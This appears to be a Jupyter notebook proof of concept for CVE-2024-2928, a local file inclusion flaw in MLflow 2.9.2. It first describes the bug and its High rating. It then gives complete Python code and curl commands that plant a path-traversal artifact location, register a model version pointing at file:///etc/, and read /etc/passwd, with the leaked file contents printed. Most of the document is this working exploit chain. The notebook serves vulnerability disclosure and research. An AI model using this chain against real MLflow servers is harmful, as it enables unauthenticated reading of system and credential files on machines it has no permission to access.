# MLflow 2.9.2 LFI Demo - CVE-2024-2928
Report: https://huntr.com/bounties/19bf02d7-6393-4a95-b9d0-d6d4d2d8c298

Resources:
   - https://pypi.org/project/mlflow/2.9.2/
   - https://github.com/mlflow/mlflow/tree/v2.9.2


### Description
This is a vulnerability in the `mlflow` package that allows an attacker to read arbitrary files on the system by sending a crafted HTTP request to the server.


### CVE Rating
This vulnerability has been rated as a `High` severity issue because of the following factors:
  - The vulnerability allows an attacker to read arbitrary files on the system.
  - The vulnerability can be exploited remotely by sending a crafted HTTP request to the server.
  - The vulnerability can be exploited without authentication.

In [1]:
import json

import http.client
import urllib.parse

def post_request(conn, endpoint, payload, headers):
  conn.request("POST", endpoint, body=payload, headers=headers)
  response = conn.getresponse()
  response_data = response.read().decode()
  return {"status": response.status, "data": response_data}


def get_request(conn, payload):
  conn.request("GET", payload)
  response = conn.getresponse()
  response_data = response.read().decode()
  return {"status": response.status, "data": response_data}


In [4]:
server = "127.0.0.1"
port = 5000
headers = {"Content-Type": "application/json"}

experiment_name = "MLflow 2.9.2 LFI Demo - CVE-2024-2928"
experiment_id = ""
run_id = ""

conn = http.client.HTTPConnection(server, port)

The first step is creating an experiment.

```bash
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "artifact_location": ""}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create'
```

In [5]:
api_endpoint = "/ajax-api/2.0/mlflow/experiments/create"

# We can chage the directory below in order to travserse the file system
artifact_location = "http:///#/../../../../../../../../../../../../../../etc/"

payload = json.dumps({
  "name": experiment_name,
  "artifact_location": artifact_location
})

response = post_request(conn, api_endpoint, payload, headers)

# Extract the experiment ID
experiment_id = json.loads(response["data"])["experiment_id"]

print("SETUP - Create an experiment")
print("Status:", response["status"])
print("Response data:", response["data"])

SETUP - Create an experiment
Status: 200
Response data: {
  "experiment_id": "500050261894365319"
}


In the next step we will associate a run and model with the experiment. 

Associate a run:
```bash
curl -X POST -H 'Content-Type: application/json' -d '{"experiment_id": "{{EXPERIMENT_ID}}"}' 'http://127.0.0.1:5000/api/2.0/mlflow/runs/create'
```

Register a model:
```bash
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'
```

In [7]:
# Step 2.1 - Associate a run
api_endpoint = "http://127.0.0.1:5000/api/2.0/mlflow/runs/create"

payload = json.dumps({
  "experiment_id": experiment_id
})

response = post_request(conn, api_endpoint, payload, headers)

# Extract the run id
run_id = json.loads(response["data"])["run"]["info"]["run_uuid"]

print("SETUP - Associate a run")
print("Status:", response["status"])
print("Response data:", response["data"])

# Step 2.2 - Register a model
api_endpoint = "/ajax-api/2.0/mlflow/registered-models/create"

payload = json.dumps({
  "name": experiment_name,
})

response = post_request(conn, api_endpoint, payload, headers)

print("SETUP - Create a registered model")
print("Status:", response["status"])
print("Response data:", response["data"])

SETUP - Associate a run
Status: 200
Response data: {
  "run": {
    "info": {
      "run_uuid": "11f8487cd1194044a51cce52cf2755cd",
      "experiment_id": "500050261894365319",
      "run_name": "persistent-midge-273",
      "user_id": "",
      "status": "RUNNING",
      "start_time": 0,
      "artifact_uri": "http:///11f8487cd1194044a51cce52cf2755cd/artifacts#/../../../../../../../../../../../../../../etc/",
      "lifecycle_stage": "active",
      "run_id": "11f8487cd1194044a51cce52cf2755cd"
    },
    "data": {
      "tags": [
        {
          "key": "mlflow.runName",
          "value": "persistent-midge-273"
        }
      ]
    },
    "inputs": {}
  }
}
SETUP - Create a registered model
Status: 200
Response data: {
  "registered_model": {
    "name": "MLflow 2.9.2 LFI Demo - CVE-2024-2928",
    "creation_timestamp": 1718735527138,
    "last_updated_timestamp": 1718735527138
  }
}


Next we will create a model version.

```bash
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'
```

In [8]:
api_endpoint = "/ajax-api/2.0/mlflow/model-versions/create"

payload = json.dumps({
  "name": experiment_name,
  "run_id": run_id,
  "source": "file:///etc/"
})

response = post_request(conn, api_endpoint, payload, headers)

print("SETUP - Link a model version to the malicious run")
print("Status:", response["status"])
print("Response data:", response["data"])

SETUP - Link a model version to the malicious run
Status: 200
Response data: {
  "model_version": {
    "name": "MLflow 2.9.2 LFI Demo - CVE-2024-2928",
    "version": "1",
    "creation_timestamp": 1718735592744,
    "last_updated_timestamp": 1718735592744,
    "current_stage": "None",
    "description": "",
    "source": "file:///etc/",
    "run_id": "11f8487cd1194044a51cce52cf2755cd",
    "status": "READY",
    "run_link": ""
  }
}


Finally we read the file `/etc/passwd` using the following request.

```bash
curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=poc&version=1'
```

In [11]:
lfi_headers = urllib.parse.urlencode({
  "name": experiment_name,
  "path": "passwd",
  "version": "1"
})

payload = f"/model-versions/get-artifact?{lfi_headers}"

response = get_request(conn, payload)

print("PAYLOAD - Read `/etc/passwd`")
print("Status:", response["status"])
print("Response data:", response["data"])

PAYLOAD - Read `/etc/passwd`
Status: 200
Response data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101: